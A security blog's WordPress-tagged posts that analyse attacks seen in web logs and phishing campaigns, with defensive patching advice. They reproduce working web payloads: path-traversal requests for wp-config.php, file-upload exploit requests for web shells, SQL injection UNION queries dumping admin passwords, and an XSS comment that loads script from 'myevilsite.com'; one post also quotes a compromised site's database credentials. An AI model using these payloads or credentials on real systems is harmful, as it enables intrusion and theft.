neonprimetime security , just trying to help: WordPress

Showing posts with label WordPress. Show all posts

Tuesday, January 9, 2018

somebody is collecting wordpress configs?

I like to take phishing sites and navigate up and down the folder hiearchy looking for interesting files

This one was interesting cause it was an open directory with like 200+ other site's wordpress configs? ( wp-config.php )

hxxp://guncelhaber[.]site/BT/

Wonder if those are the attacker's other sites? Or if they are configs that the attacker has stolen/compromised?

Sunday, April 9, 2017

WordPress sites redirecting to Weight Loss Product Site, Pharma Hack

NOTE: All Links below were active & working as of 4/9/2017

Have seen a bunch of spammy looking emails with subject line similar to

Incredible Formula Is Now Available For Everybody

All from random sender emails such as

mlhernandez@bolivar.gov.co
py10024@dongshin.net
kd-dovitec@vnn.vn

With email bodies like this with a hyperlink on the last line

Tsss... Though this exclusive product is already out there for everybody on the web, the amount is very limited, so don't tell your friends about it until you get some first.
Advanced solution and redesigned formula has been created to help you get rid of excessive weight. Natural ingredients and secret components are exactly what you need to get back in a great shape and get your dream body.
Act now as next week it will already be too late. Get a beautiful and fit body like you deserve.

The hyperlink went to sites like this that appear to be probably outdated hacked wordpress sites with unpatched plugins

hxxp://klkgraphics[.]com/wordpress_d/wp-includes/SimplePie/lib.php?c2JyeWFuQG9zaGtvc2hjb3JwLmNvbQ==
hxxp://www.sandeepguptagmatclasses[.]com/wp-admin/css/dump/db.php?aGxvdWRlbkBkZWZlbnNlLm9zaGtvc2hjb3JwLmNvbQ==
hxxp://unlimitedsuccesscoaching[.]com/wp-includes/SimplePie/Decode/old.php?dG1vcnJpc0BqbGcuY29t
hxxp://covrefugee[.]org/wp-includes/SimplePie/Decode/lib.php?bGdhbGxhY2hlckBqbGcuY29t
hxxp://www.libertywebcreation[.]com/norfolk/wp-includes/fonts/ini.php?dGxiaWdoYW1AamxnLmNvbQ==

If the user clicks on any of those links the site simply redirects to this 1 single site, thus it's likely the attacker is the same for each site

hxxp://dietokdlikefut[.]com/us/emko/t11-cla?bhu=CX2zrXTTggnGsfMQaDHNS2ZNVZWHVGZRYhPiX

The Page title on that page is

Gwen Stefani Shares Blake Shelton's Secret To Rapid Weight Loss (Pics Below)

No matter where you click on that page All links go to this follow-up url

hxxp://dietokdlikefut[.]com/us/emko/go.php?CID=313491&bhu=CX2zrXTTggnGsfMQaDHNS2ZNVZWHVGZRYhPiX

If you decide you want to buy the product, clicking checkout goes to this page

hxxps://checkout-cla-extract[.]com/?click_id=04_29517092_5bcca100-2e0d-4262-a3d7-a225b73ac143&subid1=313491&netid=3&ver=old&ad=1kN9

Also found it interesting at any point on the fake sales pitch page if you remove the php file name it redirects you to a random sub-domain that contains the exact same content

hxxp://557-healthandbeauty.dietokdlikefut[.]com/us/xvoh/cla-safflower-oil/
hxxp://852-diet.dietokdlikefut[.]com/us/hefk/cla-safflower-oil/
hxxp://110-health.dietokdlikefut[.]com/us/lldl/cla-safflower-oil/

Looks to me similar to past Pharma Hacks that I've seen where attacker is simply going around hacking weak wordpress sites in order to both bump up their search engine rankings and also simply generate traffic to their website to make money.

Let me know if I'm missing anything else important.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Saturday, February 18, 2017

Wordpress Config as homepage

@wavellan posted a spam and phishing url.

hxxp://enerjietudu[.]com/

Interesting if you browse to the homepage you get returned the wp-config.php file

Full contents here

And like every good wp-config.php file it contains information such as

define('DB_NAME', 'enerjik3460');
define('DB_USER', 'enerjik34');
define('DB_PASSWORD', 'energy34');
define('DB_HOST', '94.73.144.196');

And all the encryption deets

define('AUTH_KEY', ...
define('SECURE_AUTH_KEY',
define('LOGGED_IN_KEY',
define('NONCE_KEY',
define('AUTH_SALT',
define('SECURE_AUTH_SALT',
define('LOGGED_IN_SALT',
define('NONCE_SALT', ...

All the comments are in Turkish per google translate.

The bottom has an error showing the full path we are sitting in

Fatal error: Call to undefined function wp() in /home/enerjietudu.com/httpdocs/wp-blog-header.php on line 22

I notice that no matter which page I go to (wp-admin/admin.php, etc.) the wp-config.php contents show and an error is thrown.

If I had to guess I think somebody hacked this wordpress site by finding a vulnerability in the wordpress blog header, they found some vulnerability that outputs the content of a file, and so of course they chose the wp-config.php file, and now it's being displayed in the header of every page you navigate to. Then they used that output to login and take control of the database and then were able to use the database to write files to the www root folder and use it in phishing campaigns.

I don't claim to know everything, I'm just guessing. Anybody want to explain what really happened? Thanks!

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Tuesday, August 30, 2016

Work the Flow File Upload Sample Attack

Saw this web request and thought it was interesting enough to mention. It's the Work the Flow File Upload plugin for Wordpress and it appears to be linked to this 2015 File upload exploit.

POST /wp-content/plugins/work-the-flow-file-upload/public/assets/jquery-file-upload-9.5.0/server/php/index.php HTTP/1.1
Host: mysite.com
Content-Length: 270
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=18301442f2ce4a0aba32c60e4bf2f5db
action=upload
files=wp-classes.php

Patch your wordpress plugins or get rid of them if you don't use them!

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Monday, August 29, 2016

Wordpress Test Environment Requests

Why would somebody make a request to this path?

GET /test/wp-admin/

It appears this is a common, perhaps the default, location to install your "test" environment for a Wordpress blog. The problem appears to be if I do a google search for test wp-admin pages I get a bunch that are indexed and accessible.

I would never advise having your test environment accessible to the internet. Only have it accessible locally, you're just asking for trouble because test environments are never as locked down and monitored as production, and if your test blog is on the same server as production then you've just created a backdoor to production if an attacker can get into your test environment they're on your production server.

Another perhaps even bigger problem is that when I do the google search, most of these folders return directory listing and allow access to potentially sensitive files. Uh-oh. Lock down your test environments or remove them if you don't need them because the bad guys are looking for them!

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Wordpress Gravity Forms File Upload Attempt

Here is a sample from this weekend of last year's Gravity Forms Wordpress file upload exploit

POST/?gf_page=upload HTTP/1.1
Host: mysite.com
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Connection: keep-alive
Content-Length: 2476
Content-Type: multipart/form-data; boundary=3196e7ebf0e84b8499c31b44f2f68dd8
gform_unique_id=../../../../
name=css.php5
form_id=1
field_id=3
file=11.jpg

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Wordpress Login Wall attack example

Wordpress Login Wall was supposed to be for your protection against brute force and other login attacks. Instead per this older blog post if you use this plugin you may put yourself at risk to attacks that allow for raw eval's of php code that you pass into the login parameter. Ouch.

GET/wp-content/plugins/login-wall-etgfb/login_wall.php?login=cmd

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Thursday, August 18, 2016

Example of Wordpress File Disclosure

I saw this attack in the logs and thought it was interesting enough to mention. It's a known exploit for the WordPress Elegance Theme.

POST /wp-content/themes/elegance/lib/scripts/dl-skin.php HTTP/1.1
Host: mywebsite.mx
Content-Length: 60
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
_mysite_download_skin=../../../../../wp-config.php

It's actually quite simple, there is a PHP page called dl-skin.php that contained a POST parameter called _mysite_download_skin that was not properly sanitized / checking file paths. It is supposed to only allow a user to enter a skin file location in the current skins folder. But since it's not properly checking file path traversal the attacker can actually use the ../ shell command to go up/down folder structures and find files they want. In this case they go up 5 folders to where they believe the wp-config.php file is which is your Wordpress configuration file which probably contains keys, passwords, and all sorts of goodies. This can also be used to access the /etc/passwd file or anything else interesting on a server.

To prevent this of course upgrade your themes and plugins and Wordpress. Ideally you should remove themes and plugins you aren't using. In addition the account that is running Apache is of importance in this. If your account has proper least privilege permissions, this can limit what files the account can actually access for the attacker. But if your Apache web account is root for example or some other higher privileged account then the attacker can gain access to pretty much anywhere on your file system.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

SQL Injection Example on Five Star Review

I pasted a few interesting web attacks from very recent logs. Thought it'd be interesting to run through some of them.

GET/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from `#@__admin` limit 0,1),5,6,7,8,9#@`\'` &_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1

This first attack looks like it's related to the Five Star Review System , possibly an older well known vulnerability on a company which appears to provide websites with review capabilities. So if you just add their php code to your website, you too can have your customers review your products, provide feedback, rank it with stars, etc. The problem it appears is there must be a SQL injection vulnerability in the _FILES query string parameter. This parameter must not be getting sanitized properly and thus an attacker is able to execute SQL code against the database behind this website. You'll notice in red some values that sorta look like SQL code. Now it looks like in order to get the exploit to work they have to escape characters thus the reason you see @`\'` together to get the correct syntax down to mysql.

' or mid=' /*!50000union*//*!50000select*/1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'

Next it's interesting to see the /**/ because that looks like comments, right? They can be ignored, right? WRONG! /*!50000 actually has significance in MySQL. The "50000" refers to a MySQL version, and thus it tells MySQL that only version 5.0.0 and above should run this command.

' /*!50000union*//*!50000select*/1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'

Thus there's actually a union and select statement hidden in there !

' union select 1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'

Now you can see from here that the attacker has knowledge that the sql query must return 9 column, thus the reason in his union select he's padded it with 8 extra integer value, and only the 4th column is of any interest, so that must be the column that the website displays in html to the browser so that attacker can see his results.

select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1

Thus we're down to just that interesting column. You can see it concatenates 0x7c which per the hex conversion is a pipe (|) with the userid and password. Thus you may see as a result something like '|myusername|mypassword' returned to the screen. Finally notice that it's query the __admin table which must be were the administrator usernames and passwords like for the Five Star Review system and it's only pulling a few records, in this case it says in the limit clause 0,1 which means start at record 0 (the 1st one) and pull 1 record. So it's just returning the top record which likely is the administrator of the Five Start Review system.

GET/admin/_content/_about/aspcms_aboutedit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1 HTTP/1.1

This is a very similar attack as the one described in detail above. I'm guessing this is related to the ASP CMS (content management system) just based on the table they are tyring to grab records from (aspcms_user). Notice they are looking for userid=1 which is likely the system administrator record.

Remember to prevent SQL injection use parameterized queries so that data types cannot change and apostrophes cannot be escaped. Also use a sanitization library that escapes/encodes bad characters. Also make sure to do server side validation, if a parameter is supposed to take an ID # ... then only allow integers! If it's supposed to be a file type then make sure it matches a regex even as simple as as .*\..{1,3}.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Friday, August 12, 2016

Wordpress File Path Traversal Examples

I pasted several similar Wordpress exploit attempts from some web logs. They generally match WAF or IDS rules of file traversal. They look like this...

GET/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
GET/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
GET/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
GET/wp-content/themes/mtheme-unus/css/css.php?files=../../../../wp-config.php

These exploits take advantage of insecure wordpress plugins. Each of them have a query string parameter that would allow you to download a file. Theoretically the plugin was only supposed to allow you to download files from the current plugin directory, like music, audio, etc. that was allowed. But in this case the query string parameter wasn't properly properly the path passed in and it allowed for path traversal (../../) to go up and down the file system hierarchy. In this case the attacker is then attempting to get to the wp-config.php file which can contain your security keys , database user and password, etc. so some valuable data!

To prevent this, either patch your plugins when vulns like this come out ... or disable/remove unused plugins.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Tuesday, May 31, 2016

A File Upload Vulnerability barrage

I noticed a series of Wordpress/Joomla file upload attacks from a single IP address / attacker in a short period of time. Some of the requests were listed here. What I found interesting was not the fact that most were well known Wordpress vulnerabilities that are still unpatched by many web administrators. What I found interesting was the methodology of the malicious actor. It's likely what they have written is some sort of script/automated scanning tool, perhaps even a botnet or something that is doing this automatically. I envision that the code/script doing this probably has an array or list of well known Wordpress file upload vulnerabilities. It's probably a flexible dynamic list so that as soon as the attacker hear's about a new Wordpress file upload vulnerabilty, he can literally just add a URL path and a post parameter for the file name, and the script/botnet will probably just start scanning and attacking the internet trying to upload malicious files. Then there is likely a follow-up script that runs shortly after that connects to the uploaded backdoors and validates which ones were successful or not. In all the cases below the attacker uploads the same malicious file/name upfilees.php so that the attacker can easily go back later and determine if this was a device they compromised or not. The backdoor is probably a web shell that gives them full access to the web server's file system and the ability to run commands against the web server. Below I did my best to research a few of the attacks seen in this cycle and explain a bit.

yiw_contact[]=upfilees.php
yiw_action=sendemail

In the above HTTP Post, there were 2 parameters that started with yiw. This indicates that the attacker is likely trying to explpoit the Beauty & Clean Theme File Upload Wordpress Vulnerability which is literally as simple as posting your backdoor file to the contact field via the sendmail action. If it succeeds, your file has been uploaded to the web server.

POST/uploadify/uploadify.php
Filedata=upfilees.php

In the next HTTP Post, the attacker is likely attempting to exploit the Event Calendar Arbitrary Wordpress File Upload Vulnerability which is also as simple as passing the file you wanted uploaded as a post parameter to the uploadify.php page. Again, if successful, the attacker just uploaded a php web page to your server and can now do whatever they please.

POST/tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass=
Filedata=upfilees.php.suspected
Filename=send.php.suspected

In the next HTTP Post, the attacker is trying to exploit the tinybrowser Remote File Upload Joomla Vulnerability which is another simple vulnerability that involves posting the file you want uploaded as a parameter to the upload_file.php page. We're getting a bit repetitive and non-creative in these vulnerabilities, aren't we?

update_file=upfilees.php
action=revslider_ajax_action

In the next HTTP Post, the attacker is trying to exploit the RevSlider Wordpress File Upload Vulnerability which again requires nothing more than chosing the right action parameter and posting the file, and guess what the web server will be compromised with a nice php backdoor. Oops.

POST /sites/all/libraries/elfinder/php/connector.minimal.php
upload[]=upfilees.php
cmd=upload

In the next HTTP Post, the attacker appears to just be looking for poorly configured systems that have purposely enabled the ELFinder File Manager feature which allows you to remotely manage your web server's file system. Hmmm, can that be exploited? Yep, just post the upload command and your backdoor, and the attacker is in business.

POST /license.php
filename=upfilees.php

The final attack, I believe may be just a standard filename/location that certain attackers or botnets use to exploit systems. They probably exploited this server at some point, and added a backdoor called 'license.php' which allows arbirary file upload. So this attacker is just taking advantage of another attacker's prior compromise of this device. Easy pickings if it exists.

Wordpress & Joomla plugins should not be trusted (like anything else for that matter) and should only be added if absolutely needed. If you do need them, then you better be certain to keep them patched and updated. If you have a plugin that is really not necessary, please, please, please remove those extraneous plugins as otherwise they're going to open up huge ugly gaping holes in your security posture.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Wednesday, April 20, 2016

WordPress.com Free SSL for Everybody!

I've blogged several times about the benefits and eventual widespread adoption of of HTTPS on the Internet 1 2 3 4 5

I found this article about Wordpress.com SSL more proof that it's happening. The article says "All custom domains hosted on WordPress.com will soon have their sites automatically encrypted for free. WordPress said late Friday afternoon that more than one million sites will have encryption automatically deployed .... WordPress’ SSL cert rollout is coming courtesy of the Let’s Encrypt project, a coalition of tech providers, and privacy and legal minds, who developed a mechanism to issue free SSL certificates to any sites that wants one."

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Tuesday, April 28, 2015

WordPress XSS 0day Walkthru

I thought the Wordpress XSS vulnerability was an interesting one. I thought I'd attempt to walk through how I understand it to work.

On the comments section of any WordPress blog, a visitor can add a comment to the blog. Wordpress is actually correctly validating the input and sanitizing for XSS (Cross-Site Scripting) vulnerabilities. So what's the issue?

It's more of a quirk in the combination of how the MySql database was setup and how browsers handle malformed html.

1.) First if the comment being entered is too long, the MySql database field holding the comment cannot fit the entire comment and ends up truncating it, and actually chopping off the closing </a> tag

2.) Second, because that </a> tag was now truncated, when an Administrator views the comment for moderation (to approve or reject it) the browser will now attempt to display malformed HTML (an opening <a> tag without a closing one). Now most modern browsers don't reject malformed HTML, instead they try to automatically fix it for you. How Nice!

So if you enter your malicious comment and hit submit
<a title='xxx onmouseover=eval(unescape(/var a=document.createElement('script');a.setAttribute('src','https://myevilsite.com/thiscodegetsrunbyadmin.js');document.head.appendChild(a)/.source)) style=position;absolute;left:0;top:0;width:5000px;height:5000px AAAAAA...(tons of A's up to 65k bytes)....AAAAA' href="http://www.google.com">my link to google</a>

WordPress correctly validates that it's an ok a tag ... it's a super ugly title, but titles don't matter and can't be executed, so in the end this is just a valid link to google.com. But then WordPress saves this comment to their MySql database.

If you were to look in the WordPress database it would look something like this (it adds a paragraph tag around the text you entered too)....

<P><a title='xxx onmouseover=eval(unescape(/var a=document.createElement('script');a.setAttribute('src','https://myevilsite.com/thiscodegetsrunbyadmin.js');document.head.appendChild(a)/.source)) style=position;absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAAAAAAaa</P>

Notice that a bunch of the A's as well as the closing portion of the </a> tag are now missing because of the MySQL truncation issue.

So when the Administrator goes to view this comment for moderation, the browser actually tries to fix the broken code with something like below.

<a title='xxx' onmouseover='eval(unescape(/var a=document.createElement('script');a.setAttribute('src','https://myevilsite.com/thiscodegetsrunbyadmin.js');document.head.appendChild(a)/.source)) style=position;absolute;left:0;top:0;width:5000px;height:5000px' p='AAAAAAAAAAAAAAAAA'></a>

Notice that it so nicely decided to split my harmless title out where it found whitespace and turn it into an onmouseover event.

What could actually be done with this? Well if the Administrator is doing his moderation of the blog from a browser on the Production Web Server, then that file (https://myevilsite.com/thiscodegetsrunbyadmin.js) gets executed by the Administrator under his Administrator account directory on the Production Server. So I could put Javascript code in there for example that writes a malicious file to the Production Web Server's hard drive in one of the folders that is publically accessible. I could make sure that malicious file is one of the many Web Server backdoors so that the attacker can now browse to this file which is hosted on your Wordpress blog, and do crazy things on that page like Add/Remove/Download files, Add/Remove user accounts, etc. I own that Web Server and that Administrator account.

It's important to point out here XSS is a 2-way street. You cannot simply validate the user input as it's coming in and getting saved. You also need to validate/sanitize user input after it's pulled from a data source and before it's displayed on the screen. I've blogged about this input validation topic before, as it's very similar to the concept of importing data in from another system or 3rd party source and then displaying it on your website. Don't trust it.

Oh my, XSS is really bad no matter what shape or form it comes in! Take it seriously!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.